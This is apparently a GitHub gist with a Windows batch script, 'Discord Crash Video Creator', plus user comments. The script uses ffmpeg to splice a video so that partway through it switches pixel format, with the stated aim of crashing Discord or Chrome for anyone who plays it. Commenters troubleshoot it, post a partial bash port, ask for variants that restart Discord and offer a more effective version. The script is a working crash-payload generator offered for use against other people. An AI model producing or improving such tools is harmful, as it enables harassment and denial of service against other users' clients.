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Created January 18, 2021 01:16
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Discord Crash Video Creator
@echo off
title Discord Crash Video Creator
color c
echo ========================= NOTE =========================
echo This script creates videos that crash Discord/Chrome.
echo Hardware acceleration must be enabled for it to work.
echo Crash videos will get you banned in some Discord groups!
echo FFmpeg needs to be installed for this to work:
echo ========================================================
WHERE ffmpeg
IF %ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit
color 7
set /p filepath=Enter path to video file (or drag and drop the video here):
set timestamp=1
set /p timestamp=How many seconds in should the video crash?:
echo Getting video duration...
ffprobe -i %filepath% -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
set /p duration= < tmpfile
del tmpfile
echo Splitting video...
ffmpeg -i %filepath% -ss 0 -t %timestamp% part1.mp4
ffmpeg -i %filepath% -ss %timestamp% -t %duration% part2.mp4
echo Changing video properties...
ffmpeg -i part2.mp4 -pix_fmt yuv444p part2_new.mp4
echo Creating file list...
echo file part1.mp4> file_list.txt
echo file part2_new.mp4>> file_list.txt
echo Creating output file...
ffmpeg -f concat -safe 0 -i file_list.txt -codec copy output.mp4
echo Cleaning up old files...
del part1.mp4
del part2.mp4
del part2_new.mp4
del file_list.txt
color a
echo Output video created! It is located at "%CD%\output.mp4"
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how do you use it?

@BKSstudios do you still need help

i need help, if you could help me.

run it as a bat file

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not crashing

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Yeah same pacan, followed the tutorial and FFmpeg is all set up and I simply dragged a video I would like to crash in to the bat and the output file would be made, i'd send it to my group chat and it wouldn't crash at all, let alone my marked position, I think when you want to set seconds it just single digit like 1,10, etc and I also think you don't/shouldn't have to run the bat in administrator as when I try it doesn't let me drag a video in, thats all I think I know but yeah, not working for me.

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nbwiss commented Apr 16, 2021

Works but it makes the video very jittery. Any fix?

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the videos produced from this dindn't crash discord

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catzfx commented Apr 19, 2021

Any idea how to do the videos that restart discord?

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catzfx commented Apr 19, 2021

the videos produced from this dindn't crash discord

They do for me but I need to move the playhead of the video

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works like a charm for me

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FaceFabi commented May 4, 2021

Any idea how to do the videos that restart discord?

I need this code

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CantChooseThis commented May 5, 2021

Yo so I'm navigating to c:\windows\system32\ and output.mp4 isn't there? It says "Output video created! It is located at "C:\Windows\system32\output.mp4" " and it just.. isn't there.
EDIT: Nevermind, I looked up and saw "access denied" so I ran the bat as admin and it worked!

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So I was able to create the videos just fine and they do crash my discord, but no one else I'm not sure if I'm doing anything wrong but any insight is appreciated, thank you

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I see the code. But where can I get the instructions to add the video to it?

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The video just appears as 0 seconds in Discord and won't play at all.

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Tried a different video, now it played, but didn't crash

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there is no out put file in either system 32 or the bin folder

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Dragon911XX commented May 19, 2021

This one produces a different type of crash than other ones I've seen. It kind of just heavily lags my discord for a while, instead of restarting and disconnecting/reconnecting to the channel if you're in one.

Also this video I found works while hardware acceleration is off, but this program doesn't work with hardware acceleration off.

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I have hardware acceleration off, it still does absolutely nothing

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f0op commented May 20, 2021

How would I tell it where ffmpeg is installed?

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Works great as of mid may, also as link preview

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How would I tell it where ffmpeg is installed?

add it to your PATH or change all ffmpeg commands to the full path of your exe

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ghost commented May 24, 2021

I've been trying to convert this to BASH for use in Linux, because Wine CMD can't use ffmpeg (to my knowledge). Problem is I know almost nothing about writing bash or reading batch, so it's a slow and messy process. But here is what ive got so far:


echo ========================= NOTE =========================
echo This script creates videos that crash Discord/Chrome.
echo Hardware acceleration must be enabled for it to work.
echo Crash videos will get you banned in some Discord groups!
echo -
echo FFmpeg needs to be installed for this to work
echo ========================================================
echo -
echo -

#set location [THIS NEEDS REWORK, idk how to store dir path into var]
echo What video do you want to use? [Full Path]
echo :
echo Where is the output folder? [Full Path]
echo :

#set crash point
echo How many seconds in should the video crash?
echo -
read TIME

#set duration
echo Getting video duration...
ffprobe -i $PATHVID -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
DUR= < tmpfile
rm tmpfile

#split video
echo Splitting video...
ffmpeg -i $PATHVID -ss 0 -t $TIME part1.mp4
ffmpeg -i $PATHVID -ss $TIME -t $DUR part2.mp4



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if anyone wants i made a version that actually crashes discord

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@hedgeridge If you use Bash do you really need the script?

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btarg commented Jun 10, 2021

the videos produced from this dindn't crash discord

hardware accel needs to be on

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wickersoft commented Mar 1, 2022

Man you can't just dump files into your system32. Run it in a normal directory like your desktop.

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How do you use it?

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